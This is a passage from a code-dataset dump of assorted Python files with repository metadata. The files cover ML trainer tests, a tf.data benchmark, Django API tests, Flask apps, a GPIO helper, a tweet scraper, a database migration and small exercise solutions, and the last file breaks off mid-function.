behavior_id_team1 = \"test_brain?team=1\"\n brain_name = BehaviorIdentifiers.from_name_behavior_id(behavior_id_team0).brain_name\n\n ppo_trainer = PPOTrainer(brain_name, 0, dummy_config, True, False, 0, \"0\")\n controller = GhostController(100)\n trainer = GhostTrainer(\n ppo_trainer, brain_name, controller, 0, dummy_config, True, \"0\"\n )\n\n # first policy encountered becomes policy trained by wrapped PPO\n parsed_behavior_id0 = BehaviorIdentifiers.from_name_behavior_id(behavior_id_team0)\n policy = trainer.create_policy(parsed_behavior_id0, mock_specs)\n trainer.add_policy(parsed_behavior_id0, policy)\n trajectory_queue0 = AgentManagerQueue(behavior_id_team0)\n trainer.subscribe_trajectory_queue(trajectory_queue0)\n\n # Ghost trainer should ignore this queue because off policy\n parsed_behavior_id1 = BehaviorIdentifiers.from_name_behavior_id(behavior_id_team1)\n policy = trainer.create_policy(parsed_behavior_id1, mock_specs)\n trainer.add_policy(parsed_behavior_id1, policy)\n trajectory_queue1 = AgentManagerQueue(behavior_id_team1)\n trainer.subscribe_trajectory_queue(trajectory_queue1)\n\n time_horizon = 15\n trajectory = make_fake_trajectory(\n length=time_horizon,\n max_step_complete=True,\n observation_specs=create_observation_specs_with_shapes([(1,)]),\n action_spec=mock_specs.action_spec,\n )\n trajectory_queue0.put(trajectory)\n trainer.advance()\n\n # Check that trainer put trajectory in update buffer\n assert trainer.trainer.update_buffer.num_experiences == 15\n\n trajectory_queue1.put(trajectory)\n trainer.advance()\n\n # Check that ghost trainer ignored off policy queue\n assert trainer.trainer.update_buffer.num_experiences == 15\n # Check that it emptied the queue\n assert trajectory_queue1.empty()\n\n\ndef test_publish_queue(dummy_config):\n mock_specs = mb.setup_test_behavior_specs(\n True, False, vector_action_space=[1], vector_obs_space=8\n )\n\n behavior_id_team0 = \"test_brain?team=0\"\n behavior_id_team1 = \"test_brain?team=1\"\n\n parsed_behavior_id0 = BehaviorIdentifiers.from_name_behavior_id(behavior_id_team0)\n\n brain_name = parsed_behavior_id0.brain_name\n\n ppo_trainer = PPOTrainer(brain_name, 0, dummy_config, True, False, 0, \"0\")\n controller = GhostController(100)\n trainer = GhostTrainer(\n ppo_trainer, brain_name, controller, 0, dummy_config, True, \"0\"\n )\n\n # First policy encountered becomes policy trained by wrapped PPO\n # This queue should remain empty after swap snapshot\n policy = trainer.create_policy(parsed_behavior_id0, mock_specs)\n trainer.add_policy(parsed_behavior_id0, policy)\n policy_queue0 = AgentManagerQueue(behavior_id_team0)\n trainer.publish_policy_queue(policy_queue0)\n\n # Ghost trainer should use this queue for ghost policy swap\n parsed_behavior_id1 = BehaviorIdentifiers.from_name_behavior_id(behavior_id_team1)\n policy = trainer.create_policy(parsed_behavior_id1, mock_specs)\n trainer.add_policy(parsed_behavior_id1, policy)\n policy_queue1 = AgentManagerQueue(behavior_id_team1)\n trainer.publish_policy_queue(policy_queue1)\n\n # check ghost trainer swap pushes to ghost queue and not trainer\n assert policy_queue0.empty() and policy_queue1.empty()\n trainer._swap_snapshots()\n assert policy_queue0.empty() and not policy_queue1.empty()\n # clear\n policy_queue1.get_nowait()\n\n buffer = mb.simulate_rollout(BUFFER_INIT_SAMPLES, mock_specs)\n # Mock out reward signal eval\n copy_buffer_fields(\n buffer,\n src_key=BufferKey.ENVIRONMENT_REWARDS,\n dst_keys=[\n BufferKey.ADVANTAGES,\n RewardSignalUtil.rewards_key(\"extrinsic\"),\n RewardSignalUtil.returns_key(\"extrinsic\"),\n RewardSignalUtil.value_estimates_key(\"extrinsic\"),\n RewardSignalUtil.rewards_key(\"curiosity\"),\n RewardSignalUtil.returns_key(\"curiosity\"),\n RewardSignalUtil.value_estimates_key(\"curiosity\"),\n ],\n )\n\n trainer.trainer.update_buffer = buffer\n\n # when ghost trainer advance and wrapped trainer buffers full\n # the wrapped trainer pushes updated policy to correct queue\n assert policy_queue0.empty() and policy_queue1.empty()\n trainer.advance()\n assert not policy_queue0.empty() and policy_queue1.empty()\n\n\nif __name__ == \"__main__\":\n pytest.main()\n","repo_name":"Unity-Technologies/ml-agents","sub_path":"ml-agents/mlagents/trainers/tests/torch_entities/test_ghost.py","file_name":"test_ghost.py","file_ext":"py","file_size_in_byte":8529,"program_lang":"python","lang":"en","doc_type":"code","stars":15647,"dataset":"github-code","pt":"48"} +{"seq_id":"5002174459","text":"# USAGE\n# python reading_from_memory.py\n\n# import the necessary packages\nfrom pyimagesearch.helpers import benchmark\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.datasets import cifar100\nfrom tensorflow.data import AUTOTUNE\nimport tensorflow as tf\n\n# initialize the batch size and number of steps\nBS = 64\nNUM_STEPS = 5000\n\n# load the CIFAR-10 dataset from\nprint(\"[INFO] loading the cifar100 dataset...\")\n((trainX, trainY), (testX, testY)) = cifar100.load_data()\n\n# create a standard image generator object\nprint(\"[INFO] creating a ImageDataGenerator object...\")\nimageGen = ImageDataGenerator()\ndataGen = imageGen.flow(\n\tx=trainX, y=trainY,\n\tbatch_size=BS, shuffle=True)\n\n# build a TensorFlow dataset from the training data\ndataset = tf.data.Dataset.from_tensor_slices((trainX, trainY))\n\n# build the data input pipeline\nprint(\"[INFO] creating a tf.data input pipeline..\")\ndataset = (dataset\n\t.shuffle(1024)\n\t.cache()\n\t.repeat()\n\t.batch(BS)\n\t.prefetch(AUTOTUNE)\n)\n\n# benchmark the image data generator and display the number of data\n# points generated, along with the time taken to perform the\n# operation\ntotalTime = benchmark(dataGen, NUM_STEPS)\nprint(\"[INFO] ImageDataGenerator generated {} images in \" \\\n\t \" {:.2f} seconds...\".format(\n\tBS * NUM_STEPS, totalTime))\n\n# create a dataset iterator, benchmark the tf.data pipeline, and\n# display the number of data points generator along with the time taken\ndatasetGen = iter(dataset)\ntotalTime = benchmark(datasetGen, NUM_STEPS)\nprint(\"[INFO] tf.data generated {} images in {:.2f} seconds...\".format(\n\tBS * NUM_STEPS, totalTime))","repo_name":"marb61a/Course-Notes","sub_path":"Artificial Intellingence/Python/Notebooks/PyImageSearch University/Deep Learning 125/tfdata-intro/reading_from_memory.py","file_name":"reading_from_memory.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"6351397824","text":"import pytest\nfrom django.conf import settings\n\nfrom kubeportal.models.portalgroup import PortalGroup\n\n\n@pytest.mark.django_db\ndef test_single_group_denied(api_client_anon, admin_group):\n url = f'/api/{settings.API_VERSION}/groups/{admin_group.pk}/'\n response = api_client_anon.get(url)\n assert response.status_code == 401\n\n\n@pytest.mark.django_db\ndef test_groups_denied(api_client_anon):\n group1 = PortalGroup(name=\"group1\")\n group1.save()\n response = api_client_anon.get(f'/api/{settings.API_VERSION}/groups/{group1.pk}/')\n assert response.status_code == 401\n\n\ndef test_group(api_client, admin_group):\n response = api_client.get(f'/api/{settings.API_VERSION}/groups/{admin_group.pk}/')\n assert response.status_code == 200\n\n data = response.json()\n assert data['name'] == admin_group.name\n\n\ndef test_group_invalid_id(api_client):\n response = api_client.get(f'/api/{settings.API_VERSION}/groups/777/')\n assert response.status_code == 404\n\n\ndef test_group_non_member(api_client):\n group1 = PortalGroup(name=\"group1\")\n group1.save()\n response = api_client.get(f'/api/{settings.API_VERSION}/groups/{group1.pk}/')\n assert response.status_code == 404","repo_name":"kubeportal/kubeportal","sub_path":"kubeportal/tests/test_api_groups.py","file_name":"test_api_groups.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"9938531735","text":"from flask import Flask, render_template, request\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport joblib\nfrom sklearn.ensemble import VotingRegressor\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestRegressor\n\n\n\n# One hot encode the 'coin_name' feature\n# data = pd.get_dummies(data, columns=['coin_name'])\n\n\n# Create a Flask instance\napp = Flask(__name__)\n\n# Define the index page\n@app.route('/')\ndef index():\n return render_template('./index.html')\n\n# Define the predict page\n@app.route('/predict', methods=['POST'])\ndef predict():\n try:\n open = float(request.form['open']) if request.form['open'] else 0.0\n high = float(request.form['high']) if request.form['high'] else 0.0\n low = float(request.form['low']) if request.form['low'] else 0.0\n date = request.form['date'] if request.form['date'] else 0.0\n volume = float(request.form['volume']) if request.form['volume'] else 0.0\n coin_name = str(request.form['coin_name'])\n\n # rest of the code for prediction\n \n except Exception as e:\n x = (\"Error: {}\".format(str(e)))\n return render_template('index.html', data=x)\n\n\n\n # output validation\n if not coin_name or not open or not high or not low or not date or not volume:\n return render_template('index.html', data = \"Please fill out all fields.\")\n else:\n\n\n\n #Creating a data dictionary\n data_dict = {'Date': [date],'Open': [open], 'High': [high], 'Low': [low], 'Volume': [volume],\n 'ADA_GBP': [0], 'ATOM_GBP': [1], 'AVAX_GBP': [0], 'BNB_GBP': [0], 'BTC_GBP': [0], 'DAI_GBP': [0],\n 'DOGE_GBP': [0], 'DOT_GBP': [0], 'ETH_GBP': [0], 'FIL_GBP': [0], 'FTM_GBP': [0], 'GRC_GBP': [0],\n 'LINK_GBP': [0], 'LTC_GBP': [0], 'MATIC_GBP': [0], 'SOL_GBP': [0], 'TRX_GBP': [0], 'USDC_GBP': [0],\n 'USDT_GBP': [0], 'XRP_GBP': [0]}\n\n data_dict[coin_name] = [1]\n # create a new DataFrame with the same columns as the training data\n new_data = pd.DataFrame(data_dict)\n # convert the date column to a datetime data type\n new_data['Date'] = pd.to_datetime(new_data['Date'])\n # convert the date column to a float data type using Unix time (seconds since 1970-01-01)\n new_data['Date'] = (new_data['Date'] - pd.Timestamp(\"1970-01-01\")) // pd.Timedelta('1s')\n new_data['Date'] = new_data['Date'].astype(float)\n\n # make a prediction using the ensemble model\n model = joblib.load('ensemble.sav')\n close_price = (f\"CLOSE: {model.predict(new_data)[0]}\")\n \n\n # Return the prediction to the user\n return render_template('index.html', data=close_price)\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"C4LEB-ai/stock_prediction","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25334765483","text":"from random import randint\n\ndef solve(lock: str) -> str:\n num_list = sorted(lock, reverse=True)\n final_mod = int(lock) % 3\n\n if final_mod != 0:\n mod1_index = None\n mod2_indices = []\n\n for i in reversed(range(len(num_list))):\n num = int(num_list[i])\n current_mod = num % 3\n\n if current_mod == final_mod:\n mod1_index = i\n break\n elif current_mod != 0 and len(mod2_indices) < 2:\n mod2_indices.append(i)\n \n if mod1_index:\n num_list.pop(mod1_index)\n elif mod2_indices:\n num_list.pop(mod2_indices[0])\n num_list.pop(mod2_indices[1])\n\n return ''.join(num_list)\n\nstart = 11\nfor i in range(start, start + 20):\n inp = open('inp/' + str(i), 'w')\n out = open('out/' + str(i), 'w')\n\n inp_text = []\n for i in range(randint(3, 10**5)):\n inp_text.append(str(randint(0, 9)))\n\n inp_text = ''.join(inp_text)\n inp.write(inp_text)\n out_text = solve(inp_text) + '\\n'\n out.write(out_text)","repo_name":"thinhntr/CS112.L12.KHCL","sub_path":"bt5/khoa_so/test_generator.py","file_name":"test_generator.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42141016614","text":"#\r\r\n# Home Automation Hub\r\r\n# Helper Script to process different Actuator Types\r\r\n#\r\r\n# Catching too general exception\r\r\n# pylint: disable=W0703\r\r\n#\r\r\n\"\"\"Actuator helpers\"\"\"\r\r\n\r\r\nimport sys\r\r\nimport logging\r\r\nimport RPi.GPIO as GPIO\r\r\n\r\r\n\r\r\n# --- Global Variables ---\r\r\nHUB_LOGGER = logging.getLogger('HubLogger')\r\r\n\r\r\n# BCM Pin References\r\r\nGPIO.setmode(GPIO.BCM)\r\r\nGPIO.setwarnings(False)\r\r\n\r\r\n\r\r\ndef simple_on_off(cur_val, method_params):\r\r\n\r\r\n \"\"\"Simple On/Off\"\"\"\r\r\n\r\r\n try:\r\r\n\r\r\n bcm_pin = int(method_params[0])\r\r\n HUB_LOGGER.debug(\"In simple_on_off %s %s \", cur_val, bcm_pin)\r\r\n status = -1\r\r\n if bcm_pin is not None:\r\r\n func = GPIO.gpio_function(bcm_pin)\r\r\n is_output = (func == GPIO.OUT)\r\r\n HUB_LOGGER.debug(\"Pin Mode %s %s %s\", func, GPIO.OUT, is_output)\r\r\n\r\r\n HUB_LOGGER.debug(\"Making Output always\")\r\r\n GPIO.setup(bcm_pin, GPIO.OUT)\r\r\n\r\r\n result = (cur_val > 0)\r\r\n cur_state = GPIO.input(bcm_pin)\r\r\n requires_changing = (GPIO.input(bcm_pin) != cur_val)\r\r\n HUB_LOGGER.debug(\r\r\n \"Reading Output %d = %s requires_changing? %s\",\r\r\n bcm_pin,\r\r\n cur_state,\r\r\n requires_changing)\r\r\n\r\r\n # turn on/off?\r\r\n if requires_changing:\r\r\n HUB_LOGGER.debug(\r\r\n \"Setting Output %d to %s ...\",\r\r\n bcm_pin,\r\r\n result)\r\r\n GPIO.output(bcm_pin, result)\r\r\n status = result\r\r\n\r\r\n return status\r\r\n\r\r\n except Exception:\r\r\n HUB_LOGGER.error(\"Error in simple_on_off\")\r\r\n etype = sys.exc_info()[0]\r\r\n value = sys.exc_info()[1]\r\r\n trace = sys.exc_info()[2]\r\r\n line = trace.tb_lineno\r\r\n HUB_LOGGER.error(\"%s %s %s\", etype, value, line)\r\r\n","repo_name":"paul-warren-hub/home-hub","sub_path":"code/controller/actuator_helpers/simple_on_off.py","file_name":"simple_on_off.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22859107309","text":"def overlaps(a, b):\n if a[1] >= b[0] and a[0] <= b[1]:\n return True\n if b[1] >= a[0] and b[0] <= a[1]:\n return True\n return False\n\n\ndef parse_range(range):\n range = range.split(\"-\")\n return [int(range[0]), int(range[1])]\n\n\ncontained_count = 0\n\nwith open(\"input.txt\") as file:\n for line in file:\n ranges = line.strip().split(\",\")\n\n a = parse_range(ranges[0])\n b = parse_range(ranges[1])\n\n if overlaps(a, b):\n contained_count += 1\n\nprint(contained_count)\n","repo_name":"Pysselbit/advent-of-code-2022","sub_path":"Calendar/Day 4 - Camp Cleanup/4-B.py","file_name":"4-B.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25255859646","text":"#!/usr/bin/python3\n\n# dlicv\n\nimport argparse as _argparse\nimport os as _os\nimport urllib.request\nfrom urllib.parse import urlparse\nimport zipfile\nimport sys as _sys\n\n##############################################################\n## This is a dictionary that keeps the saved models for now\nmdlurl = 'https://github.com/CBICA/DeepMRSeg-Models/raw/main/models'\n\nmodelDict = {}\nmodelDict['dlicv'] = mdlurl + '/DLICV/DeepMRSeg_DLICV_v1.0.zip'\n\n##############################################################\n\n## Path to saved models\nDEEPMRSEG = _os.path.expanduser(_os.path.join('~', '.dlicv'))\nMDL_DIR = _os.path.join(DEEPMRSEG, 'trained_models')\n\ndef _main():\n \"\"\"Main program for the script to download pre-trained models.\"\"\"\n \n argv = _sys.argv\n\n exeName = _os.path.basename(argv[0])\n\n descTxt = '{prog} downloads pre-trained DLICV model'.format(prog=exeName)\n\n ## Download model\n mdl_type = 'dlicv'\n\n mdlurl = modelDict[mdl_type]\n mdlfname = _os.path.basename(urlparse(mdlurl).path)\n outFile = _os.path.join(MDL_DIR , mdl_type, mdlfname)\n\n if _os.path.isdir(outFile.replace('.zip', '')):\n print(\"Model already downloaded: \" + outFile.replace('.zip', ''))\n\n else:\n print(\"Loading model: \" + mdl_type)\n\n outPath = _os.path.join(MDL_DIR , mdl_type)\n if not _os.path.exists(outPath):\n _os.makedirs(outPath)\n print('Created dir : ' + outPath)\n\n urllib.request.urlretrieve(mdlurl, outFile)\n print('Downloaded model : ' + outFile)\n\n with zipfile.ZipFile(outFile, 'r') as fzip:\n fzip.extractall(outPath)\n print('Unzipped model : ' + outFile.replace('.zip', ''))\n\n _os.remove(outFile)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gurayerus/DLICV","sub_path":"DLICV/dlicv_downloadmodel.py","file_name":"dlicv_downloadmodel.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"11963326872","text":"import csv\nimport sys\nimport random\nimport cv2\nfrom gaskLibs.utils.segaug import ImgAugTransform\nfrom torch.utils.data.dataset import Dataset\n\nsys.path.insert(0, '..')\n\n\nclass ImageDataset(Dataset):\n def __init__(self, csv_path, img_size, is_aug):\n super().__init__()\n self.img_path = []\n self.labels = []\n self.transform = ImgAugTransform()\n self.isaug = is_aug\n self.img_w = img_size[0]\n self.img_h = img_size[1]\n\n with open(csv_path, newline='') as csvfile:\n rows = csv.reader(csvfile)\n _ = next(rows)\n for row in rows:\n self.img_path.append(row[0])\n self.labels.append(row[1])\n\n def __getitem__(self, index):\n\n img = cv2.imread(self.img_path[index])\n img = cv2.resize(img, (self.img_w, self.img_h))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n img_map = cv2.imread(self.labels[index])\n img_map = cv2.resize(img_map, (self.img_w, self.img_h))\n\n # pixel label to class label\n img_map = img_map / 255\n img_map = img_map.astype(int)\n\n if self.isaug:\n j = random.randint(0, 4)\n img_tensor, map_tensor = self.transform(img, img_map, j)\n\n else:\n img_tensor, map_tensor = self.transform(img, img_map, 3)\n\n return img_tensor, map_tensor\n\n def __len__(self):\n return len(self.labels)\n","repo_name":"GuffreyKu/image-segmentation","sub_path":"train_python/PTdata/Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73747475344","text":"import tweepy\nimport re\nimport csv\nimport os\nimport sys\nfrom pandas import DataFrame\n\nclass CreateTweetsCsv():\n\n def __init__(self,tweets_csv_file_path,logger,tweet_cursor,last_id_logged=None) -> None:\n self.tweets_csv_file_path = tweets_csv_file_path\n self.logger = logger\n self.last_id_logged = last_id_logged\n self.tweet_cursor = tweet_cursor\n\n def MakeCsvFile(self) -> bool:\n write_to_file = False\n if os.path.exists(self.tweets_csv_file_path):\n self.logger.info(\"Writing to file(s) ....\")\n write_to_file=True\n else:\n with open(self.tweets_csv_file_path,\"a+\") as tweets_csv_file:\n writer = csv.DictWriter(tweets_csv_file,fieldnames=[\"Tweet\",\"Reply\"])\n writer.writeheader()\n self.logger.info(\"File created ...\\nWriting to file(s) ....\")\n write_to_file = True\n\n print(\"Writing to file(s) ....\")\n\n return write_to_file\n\n def GetTweetsAndReplies(self, api, use_keywords=None):\n regex_str = \"@\\S*[^\\s]|RT |\\S*https?:\\S*|(\\n+)(?=.*)\"\n pattern = re.compile(regex_str) \n\n if self.MakeCsvFile():\n # Search for a tweet on the timeline\n # Find the replies\n try:\n self.records_added = 0\n self.current_since_id,tweet_text,reply_text= None,None,None\n # Alter the number of items to be returned\n for tweet in self.tweet_cursor.items():\n\n if use_keywords:\n replies = tweepy.Cursor(api.search,\n q='to:{} -filter:retweets'.format(tweet.user.screen_name),\n tweet_mode='extended').items(10)\n\n else:\n replies = tweepy.Cursor(api.search,\n tweet_mode='extended',\n q='to:{} -filter:retweets'.format(tweet.user.screen_name),\n include_entities=False).items(100)\n\n\n tweet_data = {\"Tweet\":[], \"Reply\":[]}\n\n try:\n for reply in replies:\n if reply.in_reply_to_status_id==tweet.id:\n # use full_text instead of text because of tweet mode extend\n tweet_text = pattern.sub('', tweet.full_text)\n else:\n if reply.in_reply_to_status_id != None:\n # Find the original tweets for the replies without\n tweetFetched = api.get_status(reply.in_reply_to_status_id,\n include_entities=False)\n tweet_text = tweetFetched.text\n tweet_text = pattern.sub('', tweet_text)\n \n reply_text = pattern.sub('', reply.full_text)\n if (tweet_text != None) & (reply_text != None):\n tweet_data[\"Tweet\"].append(tweet_text)\n tweet_data[\"Reply\"].append(reply_text)\n # Combine them all into one df\n data = DataFrame(tweet_data).drop_duplicates()\n data.to_csv(self.tweets_csv_file_path,\n mode = 'a',\n header = None,\n index = False)\n \n # Get the amount of data recieved\n self.records_added += len(data)\n # Save the last tweet id retreived\n self.current_since_id = tweet.id\n\n\n except tweepy.error.TweepError as er:\n # Log the specific errors if need be\n self.logger.error(\"TWEEPY ERROR: \",er)\n continue\n \n except Exception as e:\n self.logger.exception(e)\n self.logger.info(\"Number of entries added : \"+str(self.records_added))\n if self.current_since_id:\n self.logger.info(\"ID of last retrieved tweet before the error above: \"+str(self.current_since_id ))\n else:\n # If it hasn't completed the loop successfully even once\n self.logger.info(\"ID of last retrieved tweet before the error above: \"+str(self.last_id_logged ))\n\n\n self.logger.info(\"Number of entries added : \"+str(self.records_added))\n # Make these the last entry for easy retreival \n self.logger.info(\"ID of last retrieved tweet: \"+str(self.current_since_id ))\n\n except KeyboardInterrupt:\n # These will log the last values assigned before the interrupt\n self.logger.info(\"Number of entries added before KeybordInterrupt: \"+str(self.records_added))\n \n # if it had run through a complete cycle for tweet replies at least once\n if self.current_since_id:\n self.logger.info(\"ID of last retrieved tweet before KeybordInterrupt: \"+str(self.current_since_id ))\n else:\n # If it hasn't completed the loop successfully even once\n self.logger.info(\"ID of last retrieved tweet before KeybordInterrupt: \"+str(self.last_id_logged ))\n \n \n sys.exit(0)\n\n\n else:\n self.logger.critical(\" Could Not find/create csv file to write to\")\n \n ","repo_name":"AsetaShadrach/KenyaNLP","sub_path":"TweetCollection/GetTweets.py","file_name":"GetTweets.py","file_ext":"py","file_size_in_byte":5918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33070288276","text":"import unittest\nfrom q1python import period_generator\n\n# CRITERIA:\n# All periods and data points must be whole numbers\n# There can only ever be a maximum of 10 periods\n# Each point represents one second - a period may be no longer than 10 seconds\n# Each period must contain between one and 10 data points\n# Points must be stored in time order, with the earliest listed first\n\nlist1 = [1, 5, 6, 10, 11, 20, 21, 25, 26, 40, 41, 50]\n\nlist2 = [14, 9, 24, 2, 44, 8, 41, 4, 46, 26,\n 11, 31, 18, 24, 21, 4, 22, 50, 6, 36]\n\n\nclass TestPeriodGenerator(unittest.TestCase):\n\n # the result of this test depends on the values of list1 and list2\n def test_all_periods_and_data_points_whole_numbers(self):\n periods = period_generator(list1, list2)\n\n # all periods integers\n self.assertTrue(all(isinstance(period.start, int) and isinstance(\n period.end, int) for period in periods))\n\n # all points integers\n self.assertTrue(all(all(isinstance(point, int)\n for point in period.points) for period in periods))\n\n # similarly, the result of this test depends on the amount of values in list1\n def test_max_of_ten_periods(self):\n periods = period_generator(list1, list2)\n\n self.assertTrue(len(periods) <= 10)\n\n # similarly, the result of this test depends on the values of list1\n def test_period_no_longer_than_ten_secs(self):\n periods = period_generator(list1, list2)\n\n for period in periods:\n print((period.end - period.start))\n\n self.assertTrue(all((period.end - period.start) <=\n 10 for period in periods))\n\n def test_each_period_contains_between_one_and_ten_data_points(self):\n periods = period_generator(list1, list2)\n\n self.assertTrue(all(1 <= len(period.points)\n <= 10 for period in periods))\n\n def test_points_ordered_by_ascending(self):\n periods = period_generator(list1, list2)\n\n def list_is_ascending(list):\n output = True\n for i in range(len(list) - 1):\n if list[i+1] < list[i]:\n output = False\n return output\n\n self.assertTrue(all(list_is_ascending(period.points)\n for period in periods))\n\n# the program will NOT pass with the data set provided, due to the 3rd criteria (that a period can be no longer than 10 seconds),\n# as the penultimate period has a gap of 14 seconds (between 26 and 40)\n","repo_name":"Harrison-Hughes/anthesis-code-task","sub_path":"q2testing.py","file_name":"q2testing.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71054722067","text":"\r\n# Aluna Diana Faustino de Siqueira\r\n# Exercícios aula 17\r\n\r\nconta = 0\r\nfrutas = []\r\nn = int(input())\r\nm = int(input())\r\n\r\nfor i in range(m):\r\n nome,preco = input().split()\r\n feira = {'nome':nome,'preco':float(preco)}\r\n frutas.append(feira)\r\n\r\np = int(input())\r\n\r\nfor j in range(p):\r\n nome,quantidade = input().split()\r\n quantidade = int(quantidade)\r\n\r\n for k in frutas:\r\n if k['nome'] == nome:\r\n conta += k['preco']*quantidade\r\nprint(f'R$ {conta:.2f}')","repo_name":"dexeme/uri-solutions","sub_path":"URI_1281.py","file_name":"URI_1281.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34693609124","text":"\"\"\"empty message\n\nRevision ID: 263dec48ea7f\nRevises: \nCreate Date: 2022-08-23 12:23:44.461815\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '263dec48ea7f'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('users',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('name', sa.String(length=20), nullable=False),\n sa.Column('user_id', sa.String(length=20), nullable=False),\n sa.Column('email', sa.String(length=120), nullable=False),\n sa.Column('password', sa.String(length=255), nullable=False),\n sa.Column('birth', sa.DateTime(), nullable=False),\n sa.Column('alergy_dai', sa.Integer(), nullable=True),\n sa.Column('alergy_cru', sa.Integer(), nullable=True),\n sa.Column('alergy_nut', sa.Integer(), nullable=True),\n sa.Column('alergy_pch', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email'),\n sa.UniqueConstraint('name'),\n sa.UniqueConstraint('user_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('users')\n # ### end Alembic commands ###\n","repo_name":"Kogoon/fantastic-bassoon","sub_path":"migrations/versions/263dec48ea7f_.py","file_name":"263dec48ea7f_.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5578539383","text":"import cv2\nimport os\nimport pandas as pd\nfrom tqdm import tqdm\n\n\ndef split_ldr(root, size):\n for file in tqdm(os.listdir(root)):\n\n imgroot = os.path.join(root, file)\n image = cv2.imread(imgroot)\n\n height = image.shape[0]\n width = image.shape[1]\n\n file = file.split('.')[0]\n for y in range(0, height, size):\n for x in range(0, width, size):\n tiles = image[y:y + size, x:x + size]\n if (tiles.shape[0] == size) and (tiles.shape[1] == size):\n cv2.imwrite('data/train/split_img' + '/' + file + str(x) + '2' + str(y) + \".jpg\", tiles)\n #os.remove(root + '/input_2_aligned.tif')\n\n\ndef split_hdr(root, size):\n for file in tqdm(os.listdir(root)):\n imgroot = os.path.join(root, file)\n image = cv2.imread(imgroot, cv2.IMREAD_ANYDEPTH)\n\n height = image.shape[0]\n width = image.shape[1]\n\n file = file.split('.')[0]\n for y in range(0, height, size):\n for x in range(0, width, size):\n tiles = image[y:y + size, x:x + size]\n if (tiles.shape[0] == size) and (tiles.shape[1] == size):\n cv2.imwrite('data/train/split_img' + '/' + file + str(x) + '2' + str(y) + \".hdr\", tiles)\n #os.remove(root + '/ref_hdr_aligned.hdr')\n\n\nif __name__ == '__main__':\n #for file in tqdm(os.listdir('data/train/LDR')):\n #split_ldr('data/train/LDR', size=256)\n #for file in tqdm(os.listdir('data/train/HDR')):\n #split_hdr('data/train/HDR', size=256)\n\n df = pd.DataFrame()\n f = open('data/test/annotations.txt', 'w+')\n path = 'data/test/image_split'\n\n name_list = list()\n for file in os.listdir(path):\n name = file.split('.')[0]\n #name = name.split('_')[1]\n if name not in name_list:\n f.write(path + '/' + name + '.png' + '%%' + path + '/' + name + '.hdr\\n')\n name_list.append(name)\n f.close()","repo_name":"godwantma/HDR_reconstruction","sub_path":"split_image.py","file_name":"split_image.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42218273408","text":"#!/usr/local/bin/python\r\n\r\nfrom flask import Flask, render_template, jsonify, request, redirect, url_for, session, make_response\r\nimport secrets\r\n\r\nimport MySQLdb\r\n\r\n# My API functions\r\nfrom api import *\r\n\r\napp = Flask(__name__, static_url_path='')\r\n\r\napp.secret_key = secrets.token_urlsafe(16)\r\n\r\n#app.debug = True\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n \r\n@app.route(\"/searchTheWiki\", methods = [\"POST\"])\r\ndef searchTheWiki():\r\n queryTitle = request.form['title']\r\n numSentences = request.form['sentences']\r\n summary = \"\"\r\n image = \"\"\r\n status = \"\"\r\n try:\r\n title = searchForPage(queryTitle)\r\n title = title[0]\r\n \r\n if (isVideoGame(title)):\r\n summary = getPageSummary(title, numSentences)\r\n image = getPageImage(title)\r\n url = getURL(title)\r\n status=\"Success\"\r\n categories = getCategories(title)\r\n return jsonify(title=title, summary=summary, image=image, status=status, categories=categories, url=url)\r\n else:\r\n status = \"ERROR: That is not a video game! (If it is, please add `(video game)` to the end of the title\"\r\n except Exception as e:\r\n print(e)\r\n status = \"Page does not exist\"\r\n return 